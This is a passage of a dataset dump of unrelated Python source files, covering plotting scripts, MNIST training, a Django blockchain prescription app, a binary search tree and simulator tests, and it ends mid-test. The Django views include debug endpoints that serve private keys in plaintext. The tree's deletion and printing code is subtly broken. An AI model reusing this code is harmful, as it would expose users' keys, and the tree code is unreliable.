specified by \"training_version\" from the provided\n# config file.\n# ------------------------------------------------------------------------------------------------\n\nparser = argparse.ArgumentParser(description=\"Argument parser\")\nparser.add_argument(\"-c\", \"--config\", dest=\"config_path\", default=None, required=True, help=\"Path to the config file\")\nargs = parser.parse_args()\nconfig_path = args.config_path.strip(\".py\").replace(\"/\", \".\")\nconfig = importlib.import_module(config_path)\n\nn_bins_rinv = 3\nn_bins_mass = 6\n\nmatplotlib.rcParams.update({'font.size': 16})\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n\ndef plot_aucs(dataframe, title=None):\n fac = 1.5\n \n plt.figure(figsize=(1.1 * fac * 6.9, 1.1 * fac * 6))\n plt.imshow(dataframe, cmap='viridis')\n \n cb = plt.colorbar()\n cb.set_label(label='AUC value', fontsize=18 * fac)\n plt.clim(0.58, 0.9)\n \n plt.xticks(np.arange(0, n_bins_rinv, 1), map(lambda x: '{:.2f}'.format(float(x)), np.unique(dataframe.columns)))\n plt.yticks(np.arange(0, n_bins_mass, 1), np.unique(dataframe.index))\n \n plt.title(title, fontsize=fac * 25)\n plt.ylabel(r'$M_{Z^\\prime}$ (GeV)', fontsize=fac * 20)\n plt.xlabel(r'$r_{inv}$', fontsize=fac * 20)\n plt.xticks(fontsize=18 * fac)\n plt.yticks(fontsize=18 * fac)\n \n for mi, (mass, row) in enumerate(dataframe.iterrows()):\n for ni, (nu, auc) in enumerate(row.iteritems()):\n plt.text(ni, mi, '{:.3f}'.format(auc), ha=\"center\", va=\"center\", color=\"w\", fontsize=18 * fac)\n\n\ndef read_csv_file():\n aucs_path = config.evaluation_general_settings[\"aucs_path\"]\n filename = aucs_path + config.file_name + \"_v\" + str(config.best_model)\n data = {}\n masses = []\n rinvs = []\n \n with open(filename, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n \n first = True\n \n for row in reader:\n if first:\n first = False\n continue\n \n mass = row[0]\n rinv = row[1]\n auc = row[2]\n \n data[(mass, rinv)] = auc\n \n if mass not in masses:\n masses.append(mass)\n \n if rinv not in rinvs:\n rinvs.append(rinv)\n \n masses.sort()\n rinvs.sort()\n \n return masses, rinvs, data\n\n\ndef produce_dataframe(masses, rinvs, data):\n columns = {}\n \n for mass in masses:\n for rinv in rinvs:\n if rinv not in columns.keys():\n columns[rinv] = []\n\n if (mass, rinv) in data.keys():\n columns[rinv].append(data[(mass, rinv)])\n else:\n columns[rinv].append(0.0)\n \n return pd.DataFrame(columns, index=masses, dtype=float)\n\n\nmasses, rinvs, data = read_csv_file()\ndataframe = produce_dataframe(masses, rinvs, data)\n\nplot_aucs(dataframe)\nplt.show()","sub_path":"training/drawAUCtable.py","file_name":"drawAUCtable.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609630831","text":"# coding: utf-8\nfrom common.mnist import load_mnist\nfrom deep_convnet import DeepConvNet\nfrom trainer import Trainer\n\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\nnetwork = DeepConvNet()\ntrainer = Trainer(network,\n x_train,\n t_train,\n x_test,\n t_test,\n epochs=20,\n mini_batch_size=100,\n optimizer='Adam',\n optimizer_param={'lr': 0.001},\n evaluate_sample_num_per_epoch=1000)\ntrainer.train()\n\n# 保存参数\nnetwork.save_params(\"deep_convnet_params.pkl\")\nprint(\"Saved Network Parameters!\")\n","sub_path":"train_deepnet.py","file_name":"train_deepnet.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"9225876","text":"import matplotlib.pyplot as plt\nfrom math import sqrt\n\naas = ['A','C','D','E','F','G','H','I','K','L','M','N','P','Q','R','S','T','V','W','Y']\n# find number of amino acids\nnaa = len(aas)\n\n# read info from file aa_counts.txt\ninfo = {}\nfile_name = '2a_aa_counts.txt'\nfile = open(file_name)\nfor line in file:\n\tif (line[0:1] != '#'):\n\t\tdata = line.split()\n\t\t#print (data)\n\t\tif (len(data) > 1):\n\t\t\torganism = data[0]\n\t\t\tinfo[organism] = []\n\t\t\tGC_cont = float(data[1])\n\t\t\tinfo[organism].append(GC_cont)\n\t\t\tfor i in range(naa):\n\t\t\t\tinfo[organism].append(float(data[2+i]))\nfile.close()\n\n# find number of organisms\nn_org = len(info)\n\n# calculate percentages\npercentages = naa*[0]\nfor i in range(naa):\n\tfor organism in info:\n\t\tpercentages[i] += float(info[organism][i+1])\n\tpercentages[i] /= n_org\n# calculate standard deviation\nstd_dev = naa*[0]\nfor i in range(naa):\n\tfor organism in info:\n\t\tstd_dev[i] += (float(info[organism][i+1]) - percentages[i])**2\n\tstd_dev[i] = sqrt(std_dev[i]/n_org)\n\n#plot \nind = range(1,naa+1)\t\t\nfig = plt.figure(figsize=(8, 6))\nplt.rc('grid',ls=\"--\")\nsub = fig.add_subplot(1,1,1)\nsub.bar(ind,percentages,yerr=std_dev,error_kw={'capsize':3, 'capthick':1})\nsub.set_xlabel('amino acid')\nsub.set_xticks(ind)\nsub.set_xticklabels(aas)\nsub.set_ylabel('occurrence [%]')\nsub.set_ylim(0,12)\n\nplt.show()\n# save plot to file\nfig.savefig(\"2a_aa_freq.pdf\", bbox_inches='tight')\n\nplt.close(fig)\n\n","sub_path":"python/ens210_computationalbiology/exam1/2a_2_plot_aa_freq.py","file_name":"2a_2_plot_aa_freq.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645273692","text":"from PIL import Image\n# open an image file (.bmp,.jpg,.png,.gif) you have in the working folder\n# //imageFile = \"03802.png\"\n\nimport os\n\narr=os.listdir()\n\nfor imageFile in arr:\n if \"png\" in imageFile:\n im1 = Image.open(imageFile)\n # adjust width and height to your needs\n width = 416\n height = 416\n # use one of these filter options to resize the image\n im2 = im1.resize((width, height), Image.NEAREST) # use nearest neighbour\n # im3 = im1.resize((width, height), Image.BILINEAR) # linear interpolation in a 2x2 environment\n # im4 = im1.resize((width, height), Image.BICUBIC) # cubic spline interpolation in a 4x4 environment\n # im5 = im1.resize((width, height), Image.ANTIALIAS) # best down-sizing filter\n ext = \".png\"\n # print(imageFile.split(\".\")[0])\n num=imageFile.split(\".\")[0]\n print(num)\n print(type(num))\n im2.save(imageFile)\n # im2.save(imageFile+ ext)\n # im3.save(\"BILINEAR\" + ext)\n # im4.save(\"BICUBIC\" + ext)\n # im5.save(\"ANTIALIAS\" + ext)\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125625686","text":"import threading\nfrom time import sleep\n\n\ndef test1():\n sum = 1\n for i in range(5000000):\n sum += i\n print('1 done')\n return '1'\n\n\ndef test2():\n sum = 1\n for i in range(1000000):\n sum += i\n print('2 done')\n return '2'\n\n\ndef test3():\n sum = 0\n for i in range(100000):\n sum += i\n print('3 done')\n return '3'\n\n\ndef main():\n resp1 = threading.Thread(target=test1, args=()).start()\n resp2 = threading.Thread(target=test2, args=()).start()\n resp3 = threading.Thread(target=test3, args=()).start()\n print('main!')\n print(resp1, resp2, resp3)\n sleep(10)\n print(resp1, resp2, resp3)\n\nmain()","sub_path":"search/tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185729626","text":"# encoding=utf-8\n# Time: 8/28/17\n# File: job.py\n# Author: jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport uuid\nimport threading\nimport numpy as np\nimport re\nimport copy\nimport sys\nfrom antgo.utils.encode import *\nfrom antgo.utils import logger\nimport scipy.misc\nimport base64\nimport os\n\nPYTHON_VERSION = sys.version_info[0]\nif PYTHON_VERSION == 2:\n import Queue as queue\nelif PYTHON_VERSION == 3:\n import queue as queue\n\n\nclass Chart():\n def __init__(self,title=\"chart\", x_axis=\"x\", y_axis=\"y\"):\n self.chart_title = title\n self.chart_x_axis = x_axis\n self.chart_y_axis = y_axis\n self.chart_id = unicode(uuid.uuid1()) if PYTHON_VERSION == 2 else str(uuid.uuid1())\n self.chart_channels = []\n\n @property\n def id(self):\n return self.chart_id\n\n @property\n def title(self):\n return self.chart_title\n\n @property\n def x_axis(self):\n return self.chart_x_axis\n\n @property\n def y_axis(self):\n return self.chart_y_axis\n\n @property\n def channels_num(self):\n return len(self.chart_channels)\n\n def bind_channel(self, channel):\n channel.id = len(self.chart_channels)\n channel.chart = self\n self.chart_channels.append(channel)\n\n def clone(self):\n self.chart_id = unicode(uuid.uuid1()) if PYTHON_VERSION == 2 else str(uuid.uuid1())\n\n\nclass Channel():\n def __init__(self, channel_name = None, channel_type = None, channel_job=None, **channel_params):\n self.channel_id = -1\n self.channel_name = channel_name\n self.channel_type = channel_type\n self.channel_chart = None\n self.channel_job = channel_job\n self.channel_params = channel_params\n assert(self.channel_type in [\"IMAGE\", \"NUMERIC\", \"HISTOGRAM\"])\n\n @property\n def params(self):\n return self.channel_params\n\n @property\n def chart(self):\n return self.channel_chart\n @chart.setter\n def chart(self,val):\n self.channel_chart = val\n\n @property\n def id(self):\n return self.channel_id\n @id.setter\n def id(self,val):\n self.channel_id = val\n\n @property\n def name(self):\n return self.channel_name\n\n def reorganize_data(self, data_type, data):\n if data_type == \"IMAGE\":\n return self.reorganize_image_data(data)\n elif data_type == \"NUMERIC\":\n return self.reorganize_numeric_data(data)\n elif data_type == \"HISTOGRAM\":\n return self.reorganize_histogram_data(data)\n else:\n return data\n\n def reorganize_image_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n return None\n\n try:\n if len(data_y.shape) != 2 and len(data_y.shape) != 3:\n logger.error(\"Channel Y Must be 2 or 3 Dimension\")\n return None\n if len(data_y.shape) == 3:\n if data_y.shape[2] != 3:\n logger.error(\"Channel Y Must Possess 3 or 1 Channels\")\n return None\n\n allowed_size = 50.0\n height, width = data_y.shape[:2]\n min_scale = allowed_size / np.minimum(height, width)\n\n new_height = int(height * min_scale)\n new_width = int(width * min_scale)\n resized_img = scipy.misc.imresize(data_y,(new_height, new_width))\n # resized_img = data_y\n if resized_img.dtype == np.uint8:\n return (data_x, base64.b64encode(png_encode(resized_img)).decode('utf-8'))\n\n max_val = np.max(resized_img.flatten())\n min_val = np.min(resized_img.flatten())\n if len(data_y.shape) == 3:\n resized_img = ((resized_img - np.tile(min_val, (1,1,3))) / np.tile(max_val, (1,1,3))) * 255\n resized_img = resized_img.astype(np.uint8)\n else:\n resized_img = (resized_img - min_val) / max_val * 255\n resized_img = resized_img.astype(np.uint8)\n\n return (data_x, base64.b64encode(png_encode(resized_img)).decode('utf-8'))\n except:\n logger.error(\"Channel Y Must be Numpy Array\")\n\n def reorganize_numeric_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n\n try:\n data_y = float(data_y)\n except:\n logger.error(\"Channel Y Must be Scalar Data\")\n return (data_x, data_y)\n\n def reorganize_histogram_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n\n try:\n data_y = data_y.flatten()\n bins = 10 # default bins\n if \"BINS\" in self.params:\n bins = self.params['BINS']\n\n data_y = np.histogram(data_y, bins)\n except:\n logger.error(\"Channel Y Must be Numpy Array\")\n return (data_x, data_y)\n\n def send(self, x=0, y=0):\n # {\"CHART\", (chart_id, chart_title,...)}\n x_copy = copy.deepcopy(x)\n y_copy = copy.deepcopy(y)\n data = {\"CHANNEL\": self,\n \"DATA\": {\"CHART\": [self.chart.id,\n self.chart.title,\n self.chart.x_axis,\n self.chart.y_axis,\n self.chart.channels_num,\n self.id,\n self.channel_type,\n self.channel_name,\n x_copy,\n y_copy]}}\n\n if self.channel_job != None:\n # send data\n self.channel_job.send(data)\n\n\nclass Job(threading.Thread):\n def __init__(self, context=None):\n super(Job, self).__init__()\n self.data_queue = queue.Queue()\n self.job_context = context\n self.setDaemon(True)\n self.pid = str(os.getpid())\n self.charts = []\n \n def create_channel(self, channel_name, channel_type, **kwargs):\n return Channel(channel_name, channel_type, self, **kwargs)\n\n def create_chart(self, chart_channels, chart_title, chart_x_axis=\"x\", chart_y_axis=\"y\"):\n chart = Chart(chart_title, chart_x_axis, chart_y_axis)\n self.charts.append(chart)\n channel_type = None\n for cc in chart_channels:\n if channel_type is None:\n channel_type = cc.channel_type\n else:\n # assert channel has the same type\n assert(channel_type == cc.channel_type)\n\n chart.bind_channel(cc)\n\n @property\n def context(self):\n return self.job_context\n\n def send(self, data):\n if data is None:\n return\n\n # running stage\n data[\"STAGE\"] = self.context.stage\n self.data_queue.put(data)\n\n def stop(self):\n self.data_queue.put(None)\n\n def clone_charts(self):\n for chart in self.charts:\n chart.clone()\n\n def run(self):\n while True:\n # 0.step get data\n data = self.data_queue.get()\n\n # check whether stop thread\n if data is None:\n break\n\n # 1.step reorganize data\n job_stage = data.pop('STAGE')\n if 'CHANNEL' in data:\n job_channel = data['CHANNEL']\n chart_data = data['DATA'][\"CHART\"]\n\n # reorganize (channel_type, channel_y)\n reorganized_xy= job_channel.reorganize_data(chart_data[6], [chart_data[8], chart_data[9]])\n if reorganized_xy is None:\n continue\n chart_data[8] = reorganized_xy[0]\n chart_data[9] = reorganized_xy[1]\n\n data['DATA'][\"CHART\"] = chart_data\n\n # 2.step sending to mltalker\n if self.job_context != None and data['DATA'] != None and not self.job_context.quiet:\n self.job_context.send(data['DATA'], job_stage)","sub_path":"antgo/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"376901647","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# Python libs\nimport hashlib\n# Django packages\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views.generic import View, CreateView, ListView\n# Our Models\nfrom django.conf import settings\nfrom .models import Prescription, Block\nfrom .utils import get_qr_code, is_rx_in_block\n# Blockcypher\nfrom blockchain.utils import PoE\n\n\nclass ValidateRxView(View):\n template = \"blockchain/validate.html\"\n\n def get(self, request, *args, **kwargs):\n hash_rx = kwargs.get(\"hash_rx\")\n # Temporary solution\n rx = Prescription.objects.get(rxid=hash_rx)\n\n if hash_rx:\n # init\n context = {}\n _poe = PoE()\n try:\n context[\"poe_url\"] = settings.BASE_POE_URL+\"/\"+settings.CHAIN+\"/tx/\"+rx.block.poetxid+\"/\"\n context[\"poe\"] = _poe.attest(rx.block.poetxid)\n context[\"merkle_root\"] = rx.block.merkleroot\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return redirect(\"/\")\n return render(request, self.template, context)\n # Should add a message\n return redirect(\"/\")\n\ndef poe(request):\n ''' Proof of existence explanation '''\n return render(request, \"blockchain/poe.html\")\n\ndef rx_detail(request, hash_rx=False):\n ''' Get a hash and return the rx '''\n if request.GET.get(\"hash_rx\", False):\n hash_rx = request.GET.get(\"hash_rx\")\n\n if hash_rx:\n context = {}\n\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n except Exception as e:\n try:\n rx = Prescription.objects.get(tx_txid=hash_rx)\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return redirect(\"/block/?block_hash=%s\" % hash_rx)\n\n\n medications = get_simplified_medication_json(rx.medications.all())\n context[\"rx\"] = rx\n context[\"medications\"] = medications\n return render(request, \"blockchain/rx_detail.html\", context)\n\n\n return redirect(\"/\")\n\n\ndef rx_priv_key(request, hash_rx=False):\n # Temporary way to show key just for test, remove later\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n return HttpResponse(rx.get_priv_key, content_type=\"text/plain\")\n except Exception as e:\n return HttpResponse(\"Not Found\", content_type=\"text/plain\")\n\n\ndef qr_code(request, hash_rx=False):\n # Temporary way to show qrcode just for test, remove later\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n img = get_qr_code(rx.get_priv_key)\n return HttpResponse(img, content_type=\"image/jpeg\"\n)\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return HttpResponse(\"Not Found\", content_type=\"text/plain\")\n\n\n\ndef block_detail(request, block_hash=False):\n ''' Get a hash and return the block '''\n if request.GET.get(\"block_hash\", False):\n block_hash = request.GET.get(\"block_hash\")\n\n if block_hash:\n context = {}\n try:\n block = Block.objects.get(hash_block=block_hash)\n context[\"block_object\"] = block\n # Create URL\n context[\"poe_url\"] = settings.BASE_POE_URL+\"/\"+settings.CHAIN+\"/tx/\"+block.poetxid+\"/\"\n return render(request, \"blockchain/block_detail.html\", context)\n\n except Exception as e:\n print(\"Error found: %s, type: %s\" % (e, type(e)))\n\n return redirect(\"/\")\n\ndef get_simplified_medication_json(medications):\n medication_json = []\n for medication in medications:\n json = {}\n json['instructions'] = medication.instructions\n json['presentation'] = medication.presentation\n medication_json.append(json)\n return medication_json[::-1] # This 'pythonesque' code reverts order of lists\n\n","sub_path":"prescryptchain/blockchain/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512310050","text":"from time import sleep\n\nimport pytest\n\n\n@pytest.mark.django_db\n@pytest.mark.slow\n@pytest.mark.parametrize(\"uri\", ['/users/profiles/', ])\nclass TestUserProfiles:\n def test_page_and_submit(\n self, uri, live_server, browser_in, users, driver_wait_time\n ):\n # load page\n browser_in.get(live_server + uri)\n assert uri in browser_in.current_url\n # check table is there\n sleep(driver_wait_time)\n tables = browser_in.find_elements_by_class_name('table')\n assert len(tables) == 1\n table = tables[0]\n assert 'Approved' in table.text\n assert 'Incoming' in table.text\n assert 'test@example.com' in table.text\n # toggle a permission\n toggle_button = browser_in.find_elements_by_class_name('minus')[0]\n toggle_button.click()\n assert users['staff'].profile.approved\n","sub_path":"tests/functional_tests/apostello/test_user_profiles.py","file_name":"test_user_profiles.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391286274","text":"## {{{ http://code.activestate.com/recipes/577540/ (r2)\n\"\"\"\nBinary Search Tree: A sorted collection of values that supports\nefficient insertion, deletion, and minimum/maximum value finding.\n\"\"\"\n# Copyright (C) 2008 by Edward Loper\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\n# IMPLEMENTATION NOTES:\n#\n# Internally, we represent tree nodes using Python lists. These lists\n# may either be empty (for empty nodes) or may have length four (for\n# non-empty nodes). The non-empty nodes contain:\n#\n# [left_child, right_child, value, sort_key]\n#\n# Using lists rather than a node class more than doubles the overall\n# performance in the benchmarks that I have run.\n#\n# The sort key is always accessed as node[-1]. This allows us to\n# optimize the case where the sort key is identical to the value, by\n# encoding such nodes as simply:\n#\n# [left_child, right_child, value]\n#\n# The following constants are used to access the pieces of each search\n# node. If the constant-binding optimization recipe (which can be\n# downloaded from ) is\n# available, then it is used to replace these constants at\n# import-time, increasing the binary search tree efficiency by 3-5%.\n_LEFT = 'left'\n_RIGHT = 'right'\n\nclass Node(object):\n '''The BST node structure. It uses slots t keep the memory usage same or\n better than a list. The sort_key is a lazy evaluated property.\n '''\n __slots__ = ('right', 'left', 'value', '_sort_key')\n def __init__(self, value, sort_key = None, right = None, left = None):\n self.value = value\n if sort_key is not None:\n self._sort_key = sort_key\n self.right = right\n self.left = left\n @property\n def sort_key(self):\n ''' Property method, returns sort_key if it exists, else\n returns the value.'''\n if hasattr(self, '_sort_key'):\n return self._sort_key\n return self.value\n \nclass BinarySearchTree(object):\n \"\"\"\n A sorted collection of values that supports efficient insertion,\n deletion, and minimum/maximum value finding. Values may sorted\n either based on their own value, or based on a key value whose\n value is computed by a key function (specified as an argument to\n the constructor).\n\n BinarySearchTree allows duplicates -- i.e., a BinarySearchTree may\n contain multiple values that are equal to one another (or multiple\n values with the same key). The ordering of equal values, or\n values with equal keys, is undefined.\n \"\"\"\n def __init__(self, values = None, sort_key=None):\n \"\"\"\n Create a new empty BST. If a sort key is specified, then it\n will be used to define the sort order for the BST. If an\n explicit sort key is not specified, then each value is\n considered its own sort key.\n \"\"\"\n self._root = None\n self._sort_key = sort_key\n self._len = 0\n if len(values):\n for elem in values:\n self.insert(elem)\n\n #/////////////////////////////////////////////////////////////////\n # Public Methods\n #/////////////////////////////////////////////////////////////////\n \n def insert(self, value):\n \"\"\"\n Insert the specified value into the BST.\n \"\"\"\n \n # Get the sort key for this value.\n if self._sort_key is None:\n new_node = Node(value)\n else:\n new_node = Node(value, self._sort_key(value))\n # Walk down the tree until we find an empty node.\n if self._root is None:\n self._root = new_node\n node = self._root\n while node is not new_node:\n if new_node.sort_key < node.sort_key:\n if node.left is None:\n node.left = new_node\n node = node.left\n else:\n if node.right is None:\n node.right = new_node\n node = node.right\n self._len += 1\n \n def minimum(self):\n \"\"\"\n Return the value with the minimum sort key. If multiple\n values have the same (minimum) sort key, then it is undefined\n which one will be returned.\n \"\"\"\n return self._extreme_node(_LEFT).value\n \n def maximum(self):\n \"\"\"\n Return the value with the maximum sort key. If multiple values\n have the same (maximum) sort key, then it is undefined which one\n will be returned.\n \"\"\"\n return self._extreme_node(_RIGHT).value\n\n def find(self, sort_key):\n \"\"\"\n Find a value with the given sort key, and return it. If no such\n value is found, then raise a KeyError.\n \"\"\"\n return self._find(sort_key).value\n \n def pop_min(self):\n \"\"\"\n Return the value with the minimum sort key, and remove that value\n from the BST. If multiple values have the same (minimum) sort key,\n then it is undefined which one will be returned.\n \"\"\"\n return self._pop_node(self._extreme_node(_LEFT))\n \n def pop_max(self):\n \"\"\"\n Return the value with the maximum sort key, and remove that value\n from the BST. If multiple values have the same (maximum) sort key,\n then it is undefined which one will be returned.\n \"\"\"\n return self._pop_node(self._extreme_node(_RIGHT))\n\n def pop(self, sort_key):\n \"\"\"\n Find a value with the given sort key, remove it from the BST, and\n return it. If multiple values have the same sort key, then it is\n undefined which one will be returned. If no value has the\n specified sort key, then raise a KeyError.\n \"\"\"\n return self._pop_node(self._find(sort_key))\n\n def values(self, reverse=False):\n \"\"\"Generate the values in this BST in sorted order.\"\"\"\n if reverse:\n return self._iter(_RIGHT, _LEFT)\n else:\n return self._iter(_LEFT, _RIGHT)\n __iter__ = values\n\n def __len__(self):\n \"\"\"Return the number of items in this BST\"\"\"\n return self._len\n\n def __nonzero__(self):\n \"\"\"Return true if this BST is not empty\"\"\"\n return self._len > 0\n\n def __repr__(self):\n return '' % ', '.join('%r' % v for v in self)\n\n def __str__(self):\n return self.pprint()\n\n def pprint(self, max_depth=10, frame=True, show_key=True):\n \"\"\"\n Return a pretty-printed string representation of this binary\n search tree.\n \"\"\"\n top, mid, bot = self._pprint(self._root, max_depth, show_key)\n lines = top + [mid] + bot\n if frame:\n width = max(40, max(len(line) for line in lines))\n sout = '+-'+'MIN'.rjust(width, '-')+'-+\\n'\n sout += ''.join('| %s |\\n' % line.ljust(width) for line in lines)\n sout += '+-'+'MAX'.rjust(width, '-')+'-+\\n'\n return sout\n else:\n return '\\n'.join(lines)\n\n #/////////////////////////////////////////////////////////////////\n # Private Helper Methods\n #/////////////////////////////////////////////////////////////////\n \n def _extreme_node(self, side):\n \"\"\"\n Return the leaf node found by descending the given side of the\n BST (either _LEFT or _RIGHT).\n \"\"\"\n if self._root is None:\n raise IndexError('Empty Binary Search Tree!')\n node = self._root\n # Walk down the specified side of the tree.\n while getattr(node, side) is not None:\n node = getattr(node, side)\n return node\n\n def _find(self, sort_key):\n \"\"\"\n Return a node with the given sort key, or raise KeyError if not found.\n \"\"\"\n node = self._root\n while node:\n node_key = node.sort_key\n if sort_key < node_key:\n node = node.left\n elif sort_key > node_key:\n node = node.right\n else:\n return node\n raise KeyError(\"Key %r not found in BST\" % sort_key)\n\n def _pop_node(self, node):\n \"\"\"\n Delete the given node, and return its value.\n \"\"\"\n value = node.value\n if node.left:\n if node.right:\n # This node has a left child and a right child; find\n # the node's successor, and replace the node's value\n # with its successor's value. Then replace the\n # sucessor with its right child (the sucessor is\n # guaranteed not to have a left child). Note: node\n # and successor may not be the same length (3 vs 4)\n # because of the key-equal-to-value optimization; so\n # we have to be a little careful here.\n successor = node.right\n while successor.left:\n successor = successor.left\n node.value = successor.value\n node.sort_key = successor.sort_key\n successor = successor.right\n else:\n # This node has a left child only; replace it with\n # that child.\n node = node.left\n else:\n if node.right:\n # This node has a right child only; replace it with\n # that child.\n node = node.right\n else:\n # This node has no children; make it empty.\n del node\n self._len -= 1\n return value\n\n def _iter(self, pre, post):\n '''Helper for sorted iterators.\n - If (pre,post) = (_LEFT,_RIGHT), then this will generate items\n in sorted order.\n - If (pre,post) = (_RIGHT,_LEFT), then this will generate items\n in reverse-sorted order.\n We use an iterative implemenation (rather than the recursive one)\n for efficiency.\n '''\n stack = []\n node = self._root\n while stack or node:\n if node: # descending the tree\n stack.append(node)\n node = getattr(node, pre)\n else: # ascending the tree\n node = stack.pop()\n yield node.value\n node = getattr(node, post)\n\n def _pprint(self, node, max_depth, show_key, spacer=2):\n \"\"\"\n Returns a (top_lines, mid_line, bot_lines) tuple,\n \"\"\"\n if max_depth == 0:\n return ([], '- ...', [])\n elif not node:\n return ([], '- EMPTY', [])\n else:\n top_lines = []\n bot_lines = []\n mid_line = '-%r' % node.value\n if len(node) > 3:\n mid_line += ' (key=%r)' % node.sort_key\n if node.left:\n top, mid, bot = self._pprint(node.left, max_depth-1,\n show_key, spacer)\n indent = ' '*(len(bot)+spacer)\n top_lines += [indent+' '+line for line in top]\n top_lines.append(indent+'/'+mid)\n top_lines += [' '*(len(bot)-i+spacer-1)+'/'+' '*(i+1)+line\n for (i, line) in enumerate(bot)]\n if node.right:\n top, mid, bot = self._pprint(node.right, max_depth-1,\n show_key, spacer)\n indent = ' '*(len(top)+spacer)\n bot_lines += [' '*(i+spacer) + '\\\\' + ' ' * (len(top)-i) + line\n for (i, line) in enumerate(top)]\n bot_lines.append(indent+'\\\\'+mid)\n bot_lines += [indent+' '+line for line in bot]\n return (top_lines, mid_line, bot_lines)\n\ntry:\n # Try to use the python recipe:\n # \n # This will only work if that recipe has been saved a\n # \"optimize_constants.py\".\n from optimize_constants import bind_all\n bind_all(BinarySearchTree)\nexcept ImportError:\n pass\n## end of http://code.activestate.com/recipes/577540/ }}}\n\n","sub_path":"binarysearchtree.py","file_name":"binarysearchtree.py","file_ext":"py","file_size_in_byte":13042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"170874615","text":"from itsim.software.context import Context\nfrom itsim.machine.node import Node\nfrom itsim.machine.process_management.process import Process\nfrom itsim.machine.process_management.thread import Thread, ThreadKilled\nfrom itsim.simulator import Simulator, advance\nfrom itsim.types import Timeout\nfrom itsim.utils import assert_list\n\nfrom pytest import fixture, fail\nfrom unittest.mock import patch\n\n\n@fixture\n@patch(\"itsim.machine.node.Node\")\ndef proc_a(mock_node):\n return Process(0, mock_node)\n\n\n@fixture\n@patch(\"itsim.machine.node.Node\")\ndef proc_b(mock_node):\n return Process(1, mock_node)\n\n\n@fixture\n@patch(\"itsim.machine.process_management.process.Process\")\ndef thread(mock_proc):\n return Thread(Simulator(), mock_proc, 0)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_init(mock_node):\n n = 0\n parent = Process(n, mock_node)\n proc = Process(n, mock_node, parent)\n assert_list([\n set() == proc._children,\n parent == proc._parent,\n set() == proc._threads,\n n == proc._n,\n mock_node == proc._node,\n 0 == proc._thread_counter],\n throw=True)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_eq(mock_node, proc_a, proc_b):\n assert proc_a == proc_a\n\n n = 0\n assert Process(n, mock_node, proc_a) == Process(n, mock_node, proc_a)\n\n assert_list([\n Process(n, mock_node, proc_a) != Process(1, mock_node, proc_a),\n Process(n, mock_node, proc_a) != Process(n, Node(), proc_a)],\n throw=True)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_hash(mock_node, proc_a, proc_b):\n assert hash(proc_a) == hash(proc_a)\n\n n = 0\n assert hash(Process(n, mock_node, proc_a)) == hash(Process(n, mock_node, proc_a))\n\n assert_list([\n hash(Process(n, mock_node, proc_a)) != hash(Process(1, mock_node, proc_a)),\n hash(Process(n, mock_node, proc_a)) != hash(Process(n, Node(), proc_a))],\n throw=True)\n\n\n@patch(\"itsim.simulator.Simulator\")\ndef test_exc_in(mock_sim, 